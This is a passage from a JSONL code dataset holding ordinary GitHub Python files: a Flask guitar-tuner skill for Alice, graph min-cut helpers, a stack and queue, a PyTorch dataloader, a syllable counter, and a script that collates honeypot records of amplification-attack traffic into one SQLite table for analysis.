Deleted')\n","repo_name":"SamarNegm/Python-And-Django","sub_path":"day3/djproj/djApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37884272681","text":"import logging\nimport json\nimport os\nfrom copy import deepcopy\nfrom random import choice, shuffle\nfrom flask import Flask, request\nfrom cards import get_menu_card\nfrom constants import *\n\napp = Flask(__name__)\nlogging.basicConfig(level=logging.INFO)\nsessionStorage = {}\n\nCHOICE_DICT = {\n 1: ['1', 'один', 'первый', 'первая', 'первое', 'первые', 'раз', 'однёрка'],\n 2: ['2', 'два', 'второй', 'вторая', 'второе', 'вторые', 'двойка'],\n 3: ['3', 'три', 'третий', 'третья', 'третье', 'третьи', 'тройка'],\n 4: ['4', 'четыре', 'четвёртый', 'четвёртая', 'четвёртое', 'четвёртые', 'четвёрка',\n 'четвертый', 'четвертая', 'четвертое', 'четверка', 'четвертые'],\n 5: ['5', 'пять', 'пятый', 'пятая', 'пятое', 'пятые', 'пятёрка', 'пятерка'],\n 6: ['6', 'шестёрка', 'шесть', 'шестой', 'шестая', 'шестое', 
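[Editor's aside — hypothetical urls.py wiring for the function-based API views in the record above; the route names 'home' and 'api-list' are taken from the redirect() calls, but the URL paths themselves are invented.]

from django.urls import path
from . import views

urlpatterns = [
    path('', views.home, name='home'),
    path('api/students/', views.api_all_students, name='api-list'),
    path('api/students/<int:st_id>/', views.api_student_details, name='api-details'),
    path('api/students/create/', views.api_student_create, name='api-create'),
]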
'шаха', 'шест']\n}\n\n\n@app.route('/post', methods=['POST'])\ndef main():\n response = {\n 'session': request.json['session'],\n 'version': request.json['version'],\n 'response': {\n 'end_session': False\n }\n }\n req = request.json\n handle_dialog(response, req)\n user_id = req['session']['user_id']\n res_text = response['response']['text']\n # Здесь учитываются все баги, когда какого-то ключа нет в реквесте\n if 'original_utterance' in req['request'] and req['request']['original_utterance'] != 'ping':\n log(user_id, req['request']['original_utterance'], res_text)\n elif 'command' in req['request'] and req['request']['command'] != 'ping':\n log(user_id, req['request']['command'], res_text)\n elif 'payload' in req['request']:\n log(user_id, req['request']['payload']['text'], res_text)\n return json.dumps(response)\n\n\n# Вывод логов формата ID: запрос-ответ\ndef log(user_id, request, response):\n logging.info(f'{user_id[:5]}\\nREQUEST: {request}\\nRESPONSE: {response}\\n----------------')\n\n\ndef handle_dialog(res, req):\n user_id = req['session']['user_id']\n if req[\"request\"].get(\"original_utterance\", \"\") == 'ping':\n res['response']['text'] = 'Хватит пинговать с моего USER_ID, ты всё портишь.'\n return\n\n if req['session']['new']:\n sessionStorage[user_id] = {\n 'state': STATE_HELLO\n }\n text = 'Привет. Выберите гитару.'\n card, tts = get_menu_card(text)\n\n res['response']['text'] = text\n res['response']['card'] = card\n res['response']['tts'] = text + tts\n res['response']['buttons'] = []\n else:\n tokens = req['request']['nlu']['tokens']\n if not tokens:\n if 'payload' in req['request']:\n tokens = req['request']['payload']['text'].lower()\n else:\n tokens = req['request']['command'].lower()\n if user_id not in sessionStorage:\n sessionStorage[user_id] = {'state': STATE_HELLO}\n game_info = sessionStorage[user_id]\n\n if any(word in tokens for word in ['акустика', 'акустическая', 'кусты']):\n game_info['state'] = STATE_ACOUSTIC\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['классика', 'классическая', 'обычная']):\n game_info['state'] = STATE_CLASSIC\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['бас', 'басс', 'бочка', 'басовая', 'бас-гитара']):\n game_info['state'] = STATE_BAS\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['электро', 'электроника', 'электрогитара']):\n game_info['state'] = STATE_ELECTRO\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['помощь', 'помоги', 'как', 'подсказка']):\n res['response'][\n 'text'] = 'Выберите гитару, которую вы желаете настроить,' \\\n ' а затем прослушайте как звучат идеально настроенные' \\\n ' струны и попытайтесь добиться такого же звучания, вращая' \\\n ' соответствующие колки. Не забывайте, первая струна, это самая нижняя. 
Удачи.'\n elif any(word in tokens for word in ['умеешь', 'можешь']):\n res['response']['text'] = 'Я могу помочь вам настроить гитару.'\n elif STATE_ACOUSTIC <= game_info['state'] <= STATE_ELECTRO:\n flag = 0\n for i in CHOICE_DICT:\n if any(word in tokens for word in CHOICE_DICT[i]):\n flag = i\n break\n\n if flag:\n game_info['string'] = flag\n res['response']['text'] = f'Воспроизвожу звук {flag} струны.'\n res['response']['tts'] = '' \\\n .format(GUITARS[game_info[\"state\"] - 1][\"strings\"][str(flag)]) * REPEATS\n else:\n if 'string' in game_info and any(word in req['request']['nlu']['tokens'] for word in\n ['еще', 'ещё', 'повтори', 'повтори-ка',\n 'повтор', 'понял', 'слышал', 'услышал',\n 'расслышал', 'прослушал', 'скажи', 'а']):\n i = game_info['string']\n res['response']['text'] = f'Воспроизвожу звук {i} струны.'\n res['response'][\n 'tts'] = '' \\\n .format(GUITARS[game_info[\"state\"] - 1][\"strings\"][str(i)]) * REPEATS\n else:\n res['response']['text'] = f'Выберите струну'\n res['response']['tts'] = 'Выберите струну от 1 до {}. Первая - самая нижняя'.format(\n 4 if game_info['state'] == STATE_BAS else 6)\n add_wtf(f\"{game_info['state']}. {req['request']['original_utterance']}\")\n\n elif any(word in tokens for word in [\n 'выход', 'хватит', 'пока', 'свидания', 'стоп', 'выйти',\n 'выключи', 'останови', 'остановить', 'отмена', 'закончить',\n 'закончи', 'отстань', 'назад', 'обратно', 'верни', 'вернись'\n ]):\n res['response']['text'] = 'Пока'\n res['response']['end_session'] = True\n else:\n res['response']['text'] = choice(WTF) + ' Попробуйте ещё раз или скажите \"Помощь\".'\n add_wtf(f\"{game_info['state']}. {req['request']['original_utterance']}\")\n\n add_default_buttons(res, req)\n\n\ndef show_guitar(res, game_info):\n res['response']['text'] = 'Выберите струну.'\n res['response']['tts'] = 'Выберите струну от 1 до {}. 
Первая - самая нижняя'.format(\n 4 if game_info['state'] == STATE_BAS else 6)\n if 'string' in game_info:\n game_info.pop('string')\n for guitar in GUITARS:\n if guitar['state'] == game_info['state']:\n res['response']['buttons'] = [\n {\n 'title': s,\n 'hide': True\n } for s in guitar['strings']\n ]\n break\n\n\n# Добавление прошлых кнопок, чтобы они не пропадали после неверного запроса\ndef add_default_buttons(res, req):\n user_id = req['session']['user_id']\n game_info = sessionStorage[user_id]\n\n if 'buttons' in res['response']:\n game_info['last_btns'] = deepcopy(res['response']['buttons'])\n else:\n res['response']['buttons'] = deepcopy(sessionStorage[user_id]['last_btns'])\n\n for button in ['Помощь', 'Что ты умеешь?']:\n button_dict = {'title': button, 'hide': True}\n if button_dict not in res['response']['buttons']:\n res['response']['buttons'].append(button_dict)\n\n\ndef add_wtf(text):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'wtf.txt'), 'a', encoding='utf8') as file:\n file.write(text + '\\n')\n\n\nWTF = ['Не поняла', 'Мои нейроны Вас не понимают', 'Извините, я Вас не поняла',\n 'Моя твоя не понимать', 'Я Вас не ферштэйн', 'Извините, я вас не понимаю']\n","repo_name":"Vo5torg/GuitarTunerForAlice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71514795114","text":"import numpy as np\nimport logging\nimport networkx\nimport os\nfrom scipy import misc\nimport maxflow\n\n\ndef loadunaryfile(filename):\n file = open(filename, \"r\")\n\n xsize = int(file.readline())\n ysize = int(file.readline())\n labels = int(file.readline())\n\n data = np.empty((ysize, xsize, labels))\n\n for x in range(xsize):\n for y in range(ysize):\n for l in range(labels):\n data[y, x, l] = float(file.readline())\n\n return data\n\n\ndef readimg_normalize(imagename):\n img = misc.imread(os.path.join(\"data\", imagename))\n img = np.array(img, dtype=np.float64) / 255\n return img\n\n\ndef readimg(imagename):\n return misc.imread(os.path.join(\"data\", imagename))\n\n\ndef readimg_grayscale(imagename):\n return misc.imread(os.path.join(\"data\", imagename), 'L')\n\n\nclass Node:\n def __init__(self, y, x):\n self.y = y\n self.x = x\n\n def pos(self):\n return self.y, self.x\n\n\nclass Nodegrid:\n def __init__(self, ysize, xsize):\n # Create grid of nodes\n self.nodegrid = [[Node(y, x) for x in range(xsize)] for y in range(ysize)]\n\n self.g = networkx.DiGraph()\n for nodelist in self.nodegrid:\n self.g.add_nodes_from(nodelist)\n\n # Source node\n self.source = Node(-1, -1)\n self.sink = Node(-1, -1)\n\n self.g.add_node(self.source)\n self.g.add_node(self.sink)\n\n self.ysize = ysize\n self.xsize = xsize\n\n def loop(self, edgecallback, nodecallback):\n \"\"\"\n Loops over the grid of nodes. 
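[Editor's aside — the utility.py record continuing below wraps networkx.maximum_flow over a grid of pixel nodes; a minimal standalone example of that underlying call, with an invented four-edge graph.]

import networkx

g = networkx.DiGraph()
g.add_edge('source', 'a', capacity=3.0)
g.add_edge('source', 'b', capacity=1.0)
g.add_edge('a', 'sink', capacity=2.0)
g.add_edge('b', 'sink', capacity=2.0)

# maximum_flow returns the flow value and a per-edge flow dict
value, flows = networkx.maximum_flow(g, 'source', 'sink')
print(value)  # 3.0: 2.0 through 'a' plus 1.0 through 'b'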
Two callback functions are required:\n\n :param edgecallback: Called for every edge.\n :param nodecallback: Called for every node.\n \"\"\"\n logging.info(\"Iterate through graph.\")\n\n for y in range(self.ysize - 1):\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[y][x]\n\n # Node\n nodecallback(node_i)\n\n # Right edge\n node_j = self.nodegrid[y][x + 1]\n edgecallback(node_i, node_j)\n\n # Down edge\n node_j = self.nodegrid[y + 1][x]\n edgecallback(node_i, node_j)\n\n # Last column\n for y in range(self.ysize - 1):\n node_i = self.nodegrid[y][self.xsize - 1]\n\n # Node\n nodecallback(node_i)\n\n # Down edge\n node_j = self.nodegrid[y + 1][self.xsize - 1]\n edgecallback(node_i, node_j)\n\n # Last row\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[self.ysize - 1][x]\n\n # Node\n nodecallback(node_i)\n\n # Right edge\n node_j = self.nodegrid[self.ysize - 1][x + 1]\n edgecallback(node_i, node_j)\n\n # Last node\n nodecallback(self.nodegrid[self.ysize - 1][self.xsize - 1])\n\n def loopedges(self, edgecallback):\n logging.info(\"Iterate through edges.\")\n\n for y in range(self.ysize - 1):\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[y][x]\n\n # Right edge\n node_j = self.nodegrid[y][x + 1]\n edgecallback(node_i, node_j)\n\n # Down edge\n node_j = self.nodegrid[y + 1][x]\n edgecallback(node_i, node_j)\n\n # Last column\n for y in range(self.ysize - 1):\n node_i = self.nodegrid[y][self.xsize - 1]\n\n # Down edge\n node_j = self.nodegrid[y + 1][self.xsize - 1]\n edgecallback(node_i, node_j)\n\n # Last row\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[self.ysize - 1][x]\n\n # Right edge\n node_j = self.nodegrid[self.ysize - 1][x + 1]\n edgecallback(node_i, node_j)\n\n @staticmethod\n def loopedges_raw(callback, ysize, xsize):\n logging.info(\"Iterate through edges.\")\n\n for y in range(ysize - 1):\n for x in range(xsize - 1):\n pos_i = (y, x)\n\n # Right edge\n pos_j = (y, x + 1)\n callback(pos_i, pos_j)\n\n # Down edge\n pos_j = (y + 1, x)\n callback(pos_i, pos_j)\n\n # Last column\n for y in range(ysize - 1):\n pos_i = (y, xsize - 1)\n\n # Down edge\n pos_j = (y + 1, xsize - 1)\n callback(pos_i, pos_j)\n\n # Last row\n for x in range(xsize - 1):\n pos_i = (ysize - 1, x)\n\n # Right edge\n pos_j = (ysize - 1, x + 1)\n callback(pos_i, pos_j)\n\n @staticmethod\n def loopnodes_raw(callback, ysize, xsize):\n logging.info(\"Iterate through nodes.\")\n for y in range(ysize):\n for x in range(xsize):\n callback((y, x))\n\n def loopnodes(self, callback):\n logging.info(\"Iterate through nodes.\")\n for y in range(self.ysize):\n for x in range(self.xsize):\n callback(self.nodegrid[y][x])\n\n def add_edge(self, node_i, node_j, capacity):\n self.g.add_edge(node_i, node_j, capacity=capacity)\n\n def add_source_edge(self, node, capacity):\n self.g.add_edge(self.source, node, capacity=capacity)\n\n def add_sink_edge(self, node, capacity):\n self.g.add_edge(node, self.sink, capacity=capacity)\n\n def maxflow(self):\n logging.info(\"Calculate max flow.\")\n value, flows = networkx.maximum_flow(self.g, self.source, self.sink)\n return value, flows\n\n def mincut(self):\n logging.info(\"Calculate mincut.\")\n value, cut = networkx.minimum_cut(self.g, self.source, self.sink)\n return value, cut\n\n def getcap(self, node):\n return self.g[self.source][node][\"capacity\"]\n\n def hassourcepath(self, node):\n return node in self.g[self.source]\n\n def draw(self):\n positions = {}\n for nodelist in self.nodegrid:\n for node in nodelist:\n positions[node] = [node.x, 
node.y]\n\n        pad = 2\n        nodesize = 10\n        positions[self.source] = [self.xsize / 2 - 0.5, -pad]\n        positions[self.sink] = [self.xsize / 2 - 0.5, self.ysize + pad]\n        networkx.draw_networkx(self.g, pos=positions,\n                               node_size=nodesize, with_labels=False,\n                               width=0.5)\n\n\nclass Node_c:\n    def __init__(self, nodeid, y, x):\n        self.nodeid = nodeid\n        self.y = y\n        self.x = x\n\n\nclass Nodegrid_c:\n    def __init__(self, ysize, xsize):\n        self.g = maxflow.GraphFloat()\n\n        self.nodeids = self.g.add_grid_nodes((ysize, xsize))\n\n        self.ysize = ysize\n        self.xsize = xsize\n\n    def loop(self, edgecallback, nodecallback):\n        \"\"\"\n        Loops over the grid of nodes. Two callback functions are required:\n\n        :param edgecallback: Called for every edge.\n        :param nodecallback: Called for every node.\n        \"\"\"\n        logging.info(\"Iterate through graph.\")\n\n        for y in range(self.ysize - 1):\n            for x in range(self.xsize - 1):\n                node_i = self.getNode(y, x)\n\n                # Node\n                nodecallback(node_i)\n\n                # Right edge\n                node_j = self.getNode(y, x + 1)\n                edgecallback(node_i, node_j)\n\n                # Down edge\n                node_j = self.getNode(y + 1, x)\n                edgecallback(node_i, node_j)\n\n                # Right-down edge\n                node_j = self.getNode(y + 1, x + 1)\n                edgecallback(node_i, node_j)\n\n                node_i = self.getNode(y, x + 1)\n                node_j = self.getNode(y + 1, x)\n                edgecallback(node_i, node_j)\n\n        # Last column\n        for y in range(self.ysize - 1):\n            node_i = self.getNode(y, self.xsize - 1)\n\n            # Node\n            nodecallback(node_i)\n\n            # Down edge\n            node_j = self.getNode(y + 1, self.xsize - 1)\n            edgecallback(node_i, node_j)\n\n        # Last row\n        for x in range(self.xsize - 1):\n            node_i = self.getNode(self.ysize - 1, x)\n\n            # Node\n            nodecallback(node_i)\n\n            # Right edge\n            node_j = self.getNode(self.ysize - 1, x + 1)\n            edgecallback(node_i, node_j)\n\n        # Last node\n        nodecallback(self.getNode(self.ysize - 1, self.xsize - 1))\n\n    def add_sink_edge(self, node_i, cap):\n        self.g.add_tedge(node_i.nodeid, 0, cap)\n\n    def add_source_edge(self, node_i, cap):\n        self.g.add_tedge(node_i.nodeid, cap, 0)\n\n    def add_edge(self, node_i, node_j, cap):\n        self.g.add_edge(node_i.nodeid, node_j.nodeid, cap, cap)\n\n    def loopnodes(self, callback):\n        logging.info(\"Iterate through nodes.\")\n        for y in range(self.ysize):\n            for x in range(self.xsize):\n                callback(self.getNode(y, x))\n\n    def maxflow(self):\n        logging.info(\"Calculate max flow.\")\n        return self.g.maxflow()\n\n    def getNode(self, y, x):\n        return Node_c(self.nodeids[y, x], y, x)\n\n    def getsegment(self, node):\n        return self.g.get_segment(node.nodeid)","repo_name":"JeGa/Branch-And-Mincut","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"38444962642","text":"\n\nclass Node(object):\n    next = None\n    previous = None\n\n    def __init__(self, value):\n        self.value = value\n\n\n# Stack - LIFO\nclass Stack(object):\n    head = None\n    tail = None\n    size = 0\n\n    def push(self, value):\n        node = Node(value)\n\n        if self.tail:\n            node.previous = self.tail\n            self.tail.next = node\n\n        self.tail = node\n\n        if not self.head:\n            self.head = node\n\n        self.size += 1\n\n    def pop(self):\n        last_node = self.tail\n        self.tail = self.tail.previous\n        self.tail.next = None\n\n        self.size -= 1\n\n        return last_node.value\n\n\n# Queue - FIFO\nclass Queue(object):\n    head = None\n    tail = None\n    size = 0\n\n    def push(self, value):\n        node = Node(value)\n\n        if self.tail:\n            node.previous = self.tail\n            self.tail.next = node\n\n        self.tail = node\n\n        if not self.head:\n            self.head = 
node\n\n        self.size += 1\n\n    def pop(self):\n        first_node = self.head\n        self.head = self.head.next\n        self.head.previous = None\n\n        self.size -= 1\n\n        return first_node.value\n\n\n# test Stack:\nprint('Testing Stack LIFO')\ns = Stack()\nfor i in range(10):\n    s.push(i)\nfor i in range(5):\n    print(s.pop())\n\n\n# test Queue:\nprint('Testing Queue FIFO')\ns = Queue()\nfor i in range(10):\n    s.push(i)\nfor i in range(5):\n    print(s.pop())\n\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"algs/stack_and_queue.py","file_name":"stack_and_queue.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"13329635256","text":"import pandas as pd\nimport torch as t\nfrom torch.utils import data\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import transforms\n\nclass dataLoader(data.Dataset):\n    def __init__(self, src_path, mode):\n        \"\"\"\n        Args:\n            src_path (string): source path of the dataset.\n            mode : Indicate procedure status(training or testing)\n\n        self.img_name (string list): String list that store all image names.\n        self.label (int or float list): Numerical list that store all ground truth label values.\n        \"\"\"\n        self.src_path = src_path\n        self.mode = mode\n        self.map_label = {'Bedroom': 0, 'Coast': 1, 'Forest': 2, 'Highway': 3, 'Industrial': 4, 'InsideCity': 5, 'Kitchen': 6, 'LivingRoom': 7, 'Mountain': 8, 'Office': 9, 'OpenCountry': 10, 'Store': 11, 'Street': 12, 'Suburb': 13, 'TallBuilding': 14}\n        self.img_name, self.label = self.getData()\n\n        self.trans = transforms.Compose([transforms.Resize((250, 250), interpolation=Image.NEAREST),\n                                         transforms.ToTensor(),\n                                         transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                                              std=[0.229, 0.224, 0.225])])\n\n\n        print(\"> Found %d images...\" % (len(self.img_name)))\n\n    def __len__(self):\n        \"\"\"Return the size of the dataset\"\"\"\n        return len(self.img_name)\n\n    def __getitem__(self, index):\n        label_name = self.label[index]\n        label = self.map_label[self.label[index]]\n        path = self.src_path + self.mode + '/' + label_name + '/' + self.img_name[index]\n\n        img_origin = Image.open(path, 'r').convert('RGB')\n        img = self.trans(img_origin)\n\n        return img, label\n\n    def getData(self):\n        img = pd.read_csv(self.src_path + self.mode + '/img.csv')\n        label = pd.read_csv(self.src_path + self.mode + '/label.csv')\n\n        return np.squeeze(img.values), np.squeeze(label.values)\n\n","repo_name":"yu2guang/NCTU-CS","sub_path":"Computer-Vision/HW5-Classifier/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34339328717","text":"def check_rhythm(poem):\n    lines = poem.split()\n    syllables = []\n\n    for line in lines:\n        words = line.split('-')\n        count = 0\n        for word in words:\n            count += count_syllables(word)\n        syllables.append(count)\n\n    if len(set(syllables)) == 1:\n        return \"Парам пам-пам\"\n    else:\n        return \"Пам парам\"\n\ndef count_syllables(word):\n    vowels = \"УуЕеЫыАаООоЭэЯяИиЮю\"\n    count = 0\n\n    if word[0] in vowels: \n        count += 1\n\n    for i in range(1, len(word)):\n        if word[i] in vowels and word[i-1] not in vowels:\n            count += 1\n\n    return count\n\npoem = input(\"Введите стихотворение Винни-Пуха: \")\nresult = 
check_rhythm(poem)\nprint(result)","repo_name":"Glieq/gbPython-7","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22444657216","text":"import sqlite3\n\nmix_connection = sqlite3.connect('../db/database-2022-05-11/mix_protocol.sqlite', timeout=10)\nmix_cursor = mix_connection.cursor()\n# MIX PROTOCOL PRECISA FILTRAR >=5 E YEAR_PERIOD ENTRE 20184 E 20221\n\nmix_cursor.execute(\"DROP TABLE IF EXISTS MIX_PROTOCOL;\")\nmix_cursor.execute(\"\"\"\nCREATE TABLE MIX_PROTOCOL (\n\tid INTEGER NOT NULL,\n attack_protocol TEXT NOT NULL,\n\trequests_per_attack INTEGER NOT NULL,\n tempo_inicio TEXT NOT NULL,\n tempo_final TEXT NOT NULL,\n vitima_ip TEXT NOT NULL,\n raw_payload TEXT DEFAULT \"-\"\n);\n\"\"\")\nmix_connection.commit()\n\nprotocol_id = int(1)\nprotocol_mix = []\n\nntp_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_ntp.sqlite', timeout=10)\nntp_cursor = ntp_connection.cursor()\n\nfor ntp_row in ntp_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM NTP_MEMORY_DICT\nLEFT JOIN NTP_PAYLOAD_DICT\n ON NTP_MEMORY_DICT.payloadID = NTP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(ntp_row[0])\n tempoInicio = ntp_row[1]\n tempoFinal = ntp_row[2]\n ipVitima = ntp_row[3]\n payload = ntp_row[4]\n\n protocol_mix.append((protocol_id, \"NTP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nntp_connection.close()\nprint('ntp finish: ', len(protocol_mix))\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\n\n\nprotocol_mix = []\ndns_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_dns.sqlite', timeout=10)\ndns_cursor = dns_connection.cursor()\n\nfor dns_row in dns_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM DNS_MEMORY_DICT\nLEFT JOIN DNS_PAYLOAD_DICT\n ON DNS_MEMORY_DICT.payloadID = DNS_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(dns_row[0])\n tempoInicio = dns_row[1]\n tempoFinal = dns_row[2]\n ipVitima = dns_row[3]\n payload = dns_row[4]\n\n protocol_mix.append((protocol_id, \"DNS\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\ndns_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('dns finish: ', len(protocol_mix))\n\n\nprotocol_mix = []\nchargen_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_chargen.sqlite', timeout=10)\nchargen_cursor = chargen_connection.cursor()\n\nfor chargen_row in chargen_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM CHARGEN_MEMORY_DICT\nLEFT JOIN CHARGEN_PAYLOAD_DICT\n ON CHARGEN_MEMORY_DICT.payloadID = CHARGEN_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(chargen_row[0])\n tempoInicio = chargen_row[1]\n tempoFinal = chargen_row[2]\n ipVitima = chargen_row[3]\n payload = chargen_row[4]\n\n protocol_mix.append((protocol_id, \"CHARGEN\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nchargen_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('chargen finish: ', len(protocol_mix))\n\n\n\nprotocol_mix = []\ncldap_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_cldap.sqlite', timeout=10)\ncldap_cursor = 
cldap_connection.cursor()\n\nfor cldap_row in cldap_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM CLDAP_MEMORY_DICT\nLEFT JOIN CLDAP_PAYLOAD_DICT\n ON CLDAP_MEMORY_DICT.payloadID = CLDAP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(cldap_row[0])\n tempoInicio = cldap_row[1]\n tempoFinal = cldap_row[2]\n ipVitima = cldap_row[3]\n payload = cldap_row[4]\n\n protocol_mix.append((protocol_id, \"CLDAP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\ncldap_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('cldap finish: ', len(protocol_mix))\n\n\nprotocol_mix = []\ncoap_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_coap.sqlite', timeout=10)\ncoap_cursor = coap_connection.cursor()\n\nfor coap_row in coap_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM COAP_MEMORY_DICT\nLEFT JOIN COAP_PAYLOAD_DICT\n ON COAP_MEMORY_DICT.payloadID = COAP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(coap_row[0])\n tempoInicio = coap_row[1]\n tempoFinal = coap_row[2]\n ipVitima = coap_row[3]\n payload = coap_row[4]\n\n protocol_mix.append((protocol_id, \"COAP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\ncoap_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('coap finish: ', len(protocol_mix))\n\nprotocol_mix = []\nmemcached_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_memcached.sqlite', timeout=10)\nmemcached_cursor = memcached_connection.cursor()\n\nfor memcached_row in memcached_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM MEMCACHED_MEMORY_DICT\nLEFT JOIN MEMCACHED_PAYLOAD_DICT\n ON MEMCACHED_MEMORY_DICT.payloadID = MEMCACHED_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(memcached_row[0])\n tempoInicio = memcached_row[1]\n tempoFinal = memcached_row[2]\n ipVitima = memcached_row[3]\n payload = memcached_row[4]\n\n protocol_mix.append((protocol_id, \"MEMCACHED\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nmemcached_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('memcached finish: ', len(protocol_mix))\n\n\n\nprotocol_mix = []\nqotd_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_qotd.sqlite', timeout=10)\nqotd_cursor = qotd_connection.cursor()\n\nfor qotd_row in qotd_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM QOTD_MEMORY_DICT\nLEFT JOIN QOTD_PAYLOAD_DICT\n ON QOTD_MEMORY_DICT.payloadID = QOTD_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(qotd_row[0])\n tempoInicio = qotd_row[1]\n tempoFinal = qotd_row[2]\n ipVitima = qotd_row[3]\n payload = qotd_row[4]\n\n protocol_mix.append((protocol_id, \"QOTD\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nqotd_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('qotd finish: ', len(protocol_mix))\n\n\n\nprotocol_mix = []\nssdp_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_ssdp.sqlite', timeout=10)\nssdp_cursor = ssdp_connection.cursor()\n\nfor ssdp_row in ssdp_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n 
FROM SSDP_MEMORY_DICT\nLEFT JOIN SSDP_PAYLOAD_DICT\n ON SSDP_MEMORY_DICT.payloadID = SSDP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(ssdp_row[0])\n tempoInicio = ssdp_row[1]\n tempoFinal = ssdp_row[2]\n ipVitima = ssdp_row[3]\n payload = ssdp_row[4]\n\n protocol_mix.append((protocol_id, \"SSDP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nssdp_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('ssdp finish: ', len(protocol_mix))\n\n\nprotocol_mix = []\nsteam_games_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_steam_games.sqlite', timeout=10)\nsteam_games_cursor = steam_games_connection.cursor()\n\nfor steam_games_row in steam_games_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM MEMORY_DICT\nLEFT JOIN PAYLOAD_DICT\n ON MEMORY_DICT.payloadID = PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(steam_games_row[0])\n tempoInicio = steam_games_row[1]\n tempoFinal = steam_games_row[2]\n ipVitima = steam_games_row[3]\n payload = steam_games_row[4]\n\n protocol_mix.append((protocol_id, \"STEAM_GAMES\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nsteam_games_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('steam_games finish: ', 